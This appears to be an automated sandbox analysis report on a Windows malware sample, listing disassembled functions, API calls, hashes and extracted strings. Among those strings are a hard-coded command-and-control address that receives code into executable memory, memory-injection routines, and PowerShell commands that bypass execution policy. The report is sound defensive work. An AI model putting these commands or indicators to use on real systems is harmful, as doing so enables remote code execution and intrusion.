                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                    • String ID:
                                                                                    • API String ID: 3216391948-0
                                                                                    • Opcode ID: cba53f77fa6c43a58e77711aeefb5a73a992831c97479b4bd05ea56ffe174a68
                                                                                    • Instruction ID: dd154ea817c974e97ef7d73b686066fe5e2276528df8cc7754812583d82bc4d2
                                                                                    • Opcode Fuzzy Hash: cba53f77fa6c43a58e77711aeefb5a73a992831c97479b4bd05ea56ffe174a68
                                                                                    • Instruction Fuzzy Hash: F8116370B00109DBDB00FBA6D982AAEB7B8EF45704F50457FA504B76D2DB385E058B59
                                                                                    Function 0040C86C Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0040C8CA,?,?), ref: 0040C89F
                                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,0040C8CA,?,?), ref: 0040C8AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: 902e23e6e2c558fabe42d0862c9577194d6b3774d660575b183d7f6ebdea202e
                                                                                    • Instruction ID: a79f3244e1dae306cfdd43c11d9e05b1965ff1ec8325b00f92b99aced98e3e72
                                                                                    • Opcode Fuzzy Hash: 902e23e6e2c558fabe42d0862c9577194d6b3774d660575b183d7f6ebdea202e
                                                                                    • Instruction Fuzzy Hash: D8F0B472550608EED710FB79CD9298DBBECEB4431576005B6F400F32D2EA385F00551C
                                                                                    Function 00421DFC Relevance: 122.8, APIs: 8, Strings: 62, Instructions: 333networkmemoryinjectionCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 004221FC: LoadLibraryA.KERNEL32(?), ref: 004222E4
                                                                                    • VirtualAlloc.KERNEL32(00000000,0001E000,00003000,00000040), ref: 00421E22
                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 00421E52
                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 00421E5E
                                                                                    • VirtualProtect.KERNEL32(?,00000001,00000040,?), ref: 0042206B
                                                                                    • WriteProcessMemory.KERNEL32(000000FF,?,?,00000064,?), ref: 00422081
                                                                                    • connect.WS2_32(?,?,00000010), ref: 00422098
                                                                                    • recv.WS2_32(?,?,00001000,00000000), ref: 004220BA
                                                                                    • closesocket.WS2_32(?), ref: 004220F0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4132314048.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4132290502.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132498745.000000000065D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132525613.000000000065E000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132556469.000000000065F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132582325.0000000000661000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000663000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.0000000000668000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132606955.000000000066B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132681293.000000000066D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132708640.000000000066F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132730286.0000000000670000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4132753857.0000000000672000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Virtual$AllocLibraryLoadMemoryProcessProtectStartupWriteclosesocketconnectrecvsocket
                                                                                    • String ID: -$-$-$.$.$.$.$.$.$.$/$/$/$1$3$5$6$:$R$U$a$a$a$c$c$e$e$e$h$h$i$k$l$m$n$o$o$o$p$p$p$p$r$s$s$s$s$s$s$s$t$t$t$t$u$u$v$w$x$x$y$y
                                                                                    • API String ID: 1908411163-4220177053
                                                                                    • Opcode ID: 0a5c0964fa35a880765474ee3d056f93aba7d148df484ba7d181343147612299
                                                                                    • Instruction ID: 6eba19237a2e4297c06948fbfb06263f303c5671ab06a48b70b181f2cbbdbc92
                                                                                    • Opcode Fuzzy Hash: 0a5c0964fa35a880765474ee3d056f93aba7d148df484ba7d181343147612299
                                                                                    • Instruction Fuzzy Hash: C081FD20D083D8DEEB21C7A8D84CBDDBFB55F12748F184199D1887B282C7FA1589CB66
                                                                                    Function 027154C0 Relevance: 45.8, APIs: 16, Strings: 10, Instructions: 263registrymemorysleepCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,00020019,?), ref: 02715507
                                                                                    • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 0271552E
                                                                                    • _memset.LIBCMT ref: 02715548
                                                                                    • RegQueryValueExW.ADVAPI32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000003), ref: 02715563
                                                                                    • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 02715586
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 027155B1
                                                                                    • VirtualFree.KERNEL32(02EF0000,00000000,00008000), ref: 02715605
                                                                                    • _memset.LIBCMT ref: 02715669
                                                                                    • _memset.LIBCMT ref: 0271568D
                                                                                    • _memset.LIBCMT ref: 0271569F
                                                                                    • VirtualAlloc.KERNEL32(00000000,000311BF,00003000,00000040), ref: 02715726
                                                                                    • RegCreateKeyW.ADVAPI32 ref: 02715799
                                                                                    • RegDeleteValueW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4), ref: 027157AC
                                                                                    • RegSetValueExW.KERNEL32(?,9e9e85e05ee16fc372a0c7df6549fbd4,00000000,00000003,00000000,00000065), ref: 027157C4
                                                                                    • RegCloseKey.KERNEL32(?), ref: 027157CE
                                                                                    • Sleep.KERNEL32(00000BB8), ref: 027157FE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Value_memset$Virtual$AllocCloseQuery$CreateDeleteFreeOpenSleep
                                                                                    • String ID: !jWW$.$0d3b34577c0a66584d5bdc849e214016$9e9e85e05ee16fc372a0c7df6549fbd4$Console\0$_$e$i$l${vU_
                                                                                    • API String ID: 354323817-737951744
                                                                                    • Opcode ID: 4b56201cd74373a350aa24d4a147e81e3e950b7de695743294cf7239fc44a0fd
                                                                                    • Instruction ID: 1f60f021ab1c6ac61a6ee09cd89131c4cdc5adf8dc9a64b755a71407e3bf1bbb
                                                                                    • Opcode Fuzzy Hash: 4b56201cd74373a350aa24d4a147e81e3e950b7de695743294cf7239fc44a0fd
                                                                                    • Instruction Fuzzy Hash: D891F5B5A40214AFE725DF68DC85FAAB7BEFF84700F408559F909AB240D7B09A44CF91
                                                                                    Function 1000B570 Relevance: 40.7, APIs: 15, Strings: 6, Instructions: 3948sleepprocessCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 664 1000b570-1001164a call 10017290 call 10002da0 call 10005540 call 10001cd0 call 10011770 call 10012640 call 10001cd0 call 10011770 call 10012640 call 10005400 * 2 call 10002ec0 * 2 call 10004fe0 call 10002cd0 call 10002cb0 call 10004fe0 call 10002cd0 call 10002cb0 call 100054b0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10012620 call 10002e20 call 10005250 call 10001cd0 call 10011770 call 10012640 call 10005400 call 100138d0 call 10002cb0 call 10012620 call 10002b60 call 10005520 call 10002b60 call 10002da0 call 10005300 call 10002cb0 Sleep call 10002b60 call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10002e20 call 10005250 call 10002cb0 call 10012620 call 10002cb0 call 10002b60 call 10002da0 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10002e20 call 10005250 call 10002cd0 call 10002cb0 * 2 call 10012620 call 10002cb0 call 100139a0 call 10013a30 * 11 call 10002cb0 * 11 call 10002b60 call 10005520 call 10002b60 call 10002da0 call 10005300 call 10002cb0 Sleep call 10001cd0 call 10011770 call 10012640 call 10005400 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10013890 call 10002cb0 call 10012620 call 10002cb0 call 10012620 call 10002b60 WinExec call 10001cd0 call 10011770 call 10012640 call 10005400 call 10012620 call 10002b60 call 10001cd0 call 10011770 call 10012640 call 10005400 call 10003bc0 call 10003b90 call 10002cd0 call 10002cb0 * 3 call 10012620 call 10002b60 WinExec Sleep call 10002b60 call 10002da0 call 10005740 call 10002cb0 call 10002b60 call 10002da0 call 10005740 call 10002cb0 call 10002b60 call 10005520 call 10002b60 call 10005520 940 1001164f-10011768 call 10002cb0 * 12 call 10012620 * 2 call 10002cb0 * 2 664->940
                                                                                    APIs
                                                                                      • Part of subcall function 10005540: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10005573
                                                                                      • Part of subcall function 10005540: Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 10005672
                                                                                    • _Smanip.LIBCPMTD ref: 1000BC01
                                                                                    • _Smanip.LIBCPMTD ref: 1001051C
                                                                                      • Part of subcall function 10005400: HandleT.LIBCPMTD ref: 1000546A
                                                                                    • _Smanip.LIBCPMTD ref: 1001073A
                                                                                    • _Smanip.LIBCPMTD ref: 1001084B
                                                                                      • Part of subcall function 10005520: DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                      • Part of subcall function 10005300: ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                      • Part of subcall function 10005300: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1000A5BB,000000FF,?), ref: 10005384
                                                                                      • Part of subcall function 10005300: SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                    • Sleep.KERNEL32(000000C8,?,00000000,?,?,?,?,0000005C,?), ref: 10010947
                                                                                    • _Smanip.LIBCPMTD ref: 100109A4
                                                                                    • _Smanip.LIBCPMTD ref: 10010AD8
                                                                                    • Sleep.KERNEL32(000000C8,?,00000000), ref: 10010EF0
                                                                                    • _Smanip.LIBCPMTD ref: 1001111B
                                                                                    • _Smanip.LIBCPMTD ref: 100111D8
                                                                                    • WinExec.KERNEL32 ref: 100112B2
                                                                                    • _Smanip.LIBCPMTD ref: 100113C7
                                                                                    • _Smanip.LIBCPMTD ref: 10011483
                                                                                    • WinExec.KERNEL32 ref: 100115A4
                                                                                    • Sleep.KERNEL32(00007530,?,?,?,?,?,?,00000063,?,00000070,?,?,?,?,00000063,?), ref: 100115AF
                                                                                      • Part of subcall function 10005740: SetFileAttributesA.KERNEL32(00000000,00000080,?,1000B3D6,?,00000000), ref: 10005751
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Smanip$File$Sleep$AttributesExec$?write@?$basic_ostream@Bios_base@std@@Concurrency::task_continuation_context::task_continuation_contextD@std@@@std@@DeleteHandleModuleNameU?$char_traits@V12@
                                                                                    • String ID: .NET Framework NGEN v4.0.30320$\PolicyManagement.xml$cmd.exe /C $cmd.exe /C $powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"$powershell -ExecutionPolicy Bypass -File
                                                                                    • API String ID: 4257096594-523289145
                                                                                    • Opcode ID: 9e45987f3798403d8cc5d3410866f261607f01cdd5ae5bd5fae8056e3af5addb
                                                                                    • Instruction ID: 1d7400057bebe3c6382eebc75725cfde9b6fd82cf2fffe0597d68cd537529047
                                                                                    • Opcode Fuzzy Hash: 9e45987f3798403d8cc5d3410866f261607f01cdd5ae5bd5fae8056e3af5addb
                                                                                    • Instruction Fuzzy Hash: 66D35B50D0D6E8C9EB22C2288C587DDBEA55B22749F4441D9819C2A283C7FF1FD9CF66
                                                                                    Function 10015490 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 163networkCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 974 10015490-10015507 WSAStartup getaddrinfo 975 10015522-10015528 974->975 976 10015509-1001551d WSACleanup exit 974->976 978 10015533-10015537 975->978 977 100156ef-100156f2 976->977 979 100155c5-100155d7 freeaddrinfo 978->979 980 1001553d-10015564 socket 978->980 983 100155f2 979->983 984 100155d9-100155ed WSACleanup exit 979->984 981 10015566-1001557a WSACleanup exit 980->981 982 1001557f-100155a1 connect 980->982 981->977 985 100155a3-100155b9 closesocket 982->985 986 100155be 982->986 987 100155f9-10015628 recv 983->987 984->977 985->978 986->979 988 10015671-10015675 987->988 989 1001562a-10015644 987->989 993 10015677 988->993 994 1001567b-100156ac closesocket WSACleanup free exit 988->994 991 10015646-1001566a realloc 989->991 992 1001566f-100156b2 989->992 991->992 992->987 996 100156b8-100156e7 VirtualAlloc memcpy 992->996 993->996 994->977 997 100156ed 996->997 997->977
                                                                                    APIs
                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 100154B3
                                                                                    • getaddrinfo.WS2_32(154.82.85.107,18852,?,00000000), ref: 100154FA
                                                                                    • WSACleanup.WS2_32 ref: 10015509
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 10015511
                                                                                    • socket.WS2_32(?,?,?), ref: 10015552
                                                                                    • WSACleanup.WS2_32 ref: 10015566
                                                                                    • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 1001556E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cleanupexit$Startupgetaddrinfosocket
                                                                                    • String ID: 154.82.85.107$18852
                                                                                    • API String ID: 2357443324-1825080259
                                                                                    • Opcode ID: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                    • Instruction ID: 8ea8c21000931f3664100cedd98eebcd754df86da53339749fb4ddc4d9d3f251
                                                                                    • Opcode Fuzzy Hash: e95435a8fdc8111f0b9742af6ecca4abf10dc5fbecb642431ec3339c5d7ba993
                                                                                    • Instruction Fuzzy Hash: 576128B5904629EFE704DFA4CC88F9DB7B5FB08306F148219E519AB2A0C775DA80CF65
                                                                                    Function 1001063B Relevance: 32.4, APIs: 13, Strings: 5, Instructions: 943sleepprocessCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • _Smanip.LIBCPMTD ref: 1001073A
                                                                                      • Part of subcall function 10005400: HandleT.LIBCPMTD ref: 1000546A
                                                                                    • _Smanip.LIBCPMTD ref: 1001084B
                                                                                      • Part of subcall function 10005520: DeleteFileA.KERNEL32(1000A58A,?,1000A58A,00000000,?,?,?,0000005C,?), ref: 10005527
                                                                                      • Part of subcall function 10005300: ??Bios_base@std@@QBE_NXZ.MSVCP140(?,00000022,00000040,00000001), ref: 1000534A
                                                                                      • Part of subcall function 10005300: ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBD_J@Z.MSVCP140(1000A5BB,000000FF,?), ref: 10005384
                                                                                      • Part of subcall function 10005300: SetFileAttributesA.KERNEL32(00000000,00000001), ref: 100053A0
                                                                                    • Sleep.KERNEL32(000000C8,?,00000000,?,?,?,?,0000005C,?), ref: 10010947
                                                                                    • _Smanip.LIBCPMTD ref: 100109A4
                                                                                    • _Smanip.LIBCPMTD ref: 10010AD8
                                                                                    • Sleep.KERNEL32(000000C8,?,00000000), ref: 10010EF0
                                                                                    • _Smanip.LIBCPMTD ref: 1001111B
                                                                                    • _Smanip.LIBCPMTD ref: 100111D8
                                                                                    • WinExec.KERNEL32 ref: 100112B2
                                                                                    • _Smanip.LIBCPMTD ref: 100113C7
                                                                                    • _Smanip.LIBCPMTD ref: 10011483
                                                                                    • WinExec.KERNEL32 ref: 100115A4
                                                                                    • Sleep.KERNEL32(00007530,?,?,?,?,?,?,00000063,?,00000070,?,?,?,?,00000063,?), ref: 100115AF
                                                                                      • Part of subcall function 10005740: SetFileAttributesA.KERNEL32(00000000,00000080,?,1000B3D6,?,00000000), ref: 10005751
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4135367303.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4135346021.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135394974.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135417512.000000001001C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4135440852.000000001001D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_10000000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Smanip$FileSleep$AttributesExec$?write@?$basic_ostream@Bios_base@std@@D@std@@@std@@DeleteHandleU?$char_traits@V12@
                                                                                    • String ID: \PolicyManagement.xml$cmd.exe /C $cmd.exe /C $powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"$powershell -ExecutionPolicy Bypass -File
                                                                                    • API String ID: 2403214002-703889769
                                                                                    • Opcode ID: 95c285ceadc03ba962dc335a14688626ae0374982d28f6f54252d4d4ce3d691d
                                                                                    • Instruction ID: 89a6048f31c0d9b9dc8eed6deba1614e217759769de3e834a74d5456fb66c3b8
                                                                                    • Opcode Fuzzy Hash: 95c285ceadc03ba962dc335a14688626ae0374982d28f6f54252d4d4ce3d691d
                                                                                    • Instruction Fuzzy Hash: 79B23B75C08298DAEB25CBA8CC45BDEBBB1AF15304F0441D9D14D67292DBB52B88CF62
                                                                                    Function 02712D80 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • ResetEvent.KERNEL32(?), ref: 02712D9B
                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 02712DA7
                                                                                    • timeGetTime.WINMM ref: 02712DAD
                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 02712DDA
                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 02712E06
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02712E12
                                                                                    • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 02712E31
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 02712E3D
                                                                                    • gethostbyname.WS2_32(00000000), ref: 02712E4B
                                                                                    • htons.WS2_32(?), ref: 02712E6D
                                                                                    • connect.WS2_32(?,?,00000010), ref: 02712E8B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4133967983.0000000002711000.00000020.00001000.00020000.00000000.sdmp, Offset: 02710000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4133938854.0000000002710000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134001989.0000000002725000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134035437.0000000002729000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134065766.000000000272F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000005.00000002.4134094665.0000000002731000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_2710000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                    • String ID: 0u
                                                                                    • API String ID: 640718063-3203441087
                                                                                    • Opcode ID: bf54ab78a635b82786b1d67d9feaf3a3facb303badc60f5b0f2d216ffb98c486
                                                                                    • Instruction ID: f0e76c9f097766be7ebdac88d725913a4bc82d495d79ff6ff94a7ee23d4420a3
                                                                                    • Opcode Fuzzy Hash: bf54ab78a635b82786b1d67d9feaf3a3facb303badc60f5b0f2d216ffb98c486
                                                                                    • Instruction Fuzzy Hash: 3E6152B1A40304AFE724DFA8DC45FAAB7B9FF48710F504619FA46A72C0D7B0A904CB65
                                                                                    Function 03072DA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 203networkstringtimeCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • ResetEvent.KERNEL32(?), ref: 03072DBB
                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 03072DC7
                                                                                    • timeGetTime.WINMM ref: 03072DCD
                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 03072DFA
                                                                                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 03072E26
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03072E32
                                                                                    • lstrlenW.KERNEL32(?,00000000,000000CA,00000000,00000000), ref: 03072E51
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000), ref: 03072E5D
                                                                                    • gethostbyname.WS2_32(00000000), ref: 03072E6B
                                                                                    • htons.WS2_32(?), ref: 03072E8D
                                                                                    • connect.WS2_32(?,?,00000010), ref: 03072EAB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000005.00000002.4134634389.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Offset: 03070000, based on PE: true
                                                                                    • Associated: 00000005.00000002.4134634389.00000000030A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_5_2_3070000_leBwnyHIgx.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWidelstrlen$EventExchangeInterlockedResetTimeconnectgethostbynamehtonssockettime
                                                                                    • String ID: 0u
                                                                                    • API String ID: 640718063-3203441087
                                                                                    • Opcode ID: 60d5030235294248ba38c0ddeeeba06d29389df4dc07966597ea558cc7c68678
                                                                                    • Instruction ID: fc034aa22d5c4ca023ea172153e623c84faa2ec27eb1db378dd8e74da381f061
                                                                                    • Opcode Fuzzy Hash: 60d5030235294248ba38c0ddeeeba06d29389df4dc07966597ea558cc7c68678
                                                                                    • Instruction Fuzzy Hash: 80616171A41308BFD720EFA4DC45FAAB7BCFF48B10F10451AF655AB290D674A9048B64
                                                                                    Function 03076A70 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 141memoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1314 3076a70-3076ae3 call 307eff4 GetCurrentProcessId wsprintfW call 3076910 call 3086770 GetVersionExW 1321 3076be6-3076bec 1314->1321 1322 3076ae9-3076af0 1314->1322 1323 3076c14-3076c21 wsprintfW 1321->1323 1322->1321 1324 3076af6-3076afd 1322->1324 1326 3076c24-3076c26 1323->1326 1324->1321 1325 3076b03-3076b21 GetCurrentProcess OpenProcessToken 1324->1325 1325->1321 1327 3076b27-3076b47 GetTokenInformation 1325->1327 1328 3076c31-3076c46 call 307f00a 1326->1328 1329 3076c28-3076c2e call 307fac9 1326->1329 1331 3076bbb-3076bce CloseHandle 1327->1331 1332 3076b49-3076b52 GetLastError 1327->1332 1329->1328 1335 3076bf6-3076bfc 1331->1335 1336 3076bd0 1331->1336 1332->1331 1338 3076b54-3076b6b LocalAlloc 1332->1338 1341 3076c0e-3076c0f 1335->1341 1342 3076bfe-3076c04 1335->1342 1339 3076bd2-3076bd4 1336->1339 1340 3076bee-3076bf4 1336->1340 1338->1331 1343 3076b6d-3076b8d GetTokenInformation 1338->1343 1339->1321 1344 3076bd6-3076bdc 1339->1344 1340->1323 1341->1323 1342->1326 1345 3076c06-3076c0c 1342->1345 1346 3076b8f-3076bac GetSidSubAuthorityCount GetSidSubAuthority 1343->1346 1347 3076bae-3076bb5 LocalFree 1343->1347 1344->1326 1348 3076bde-3076be4 1344->1348 1345->1323 1346->1347 1347->1331 1348->1323
                                                                                    APIs
                                                                                    • GetCurrentProcessId.KERNEL32(75BF73E0), ref: 03076A94
                                                                                    • wsprintfW.USER32 ref: 03076AA7
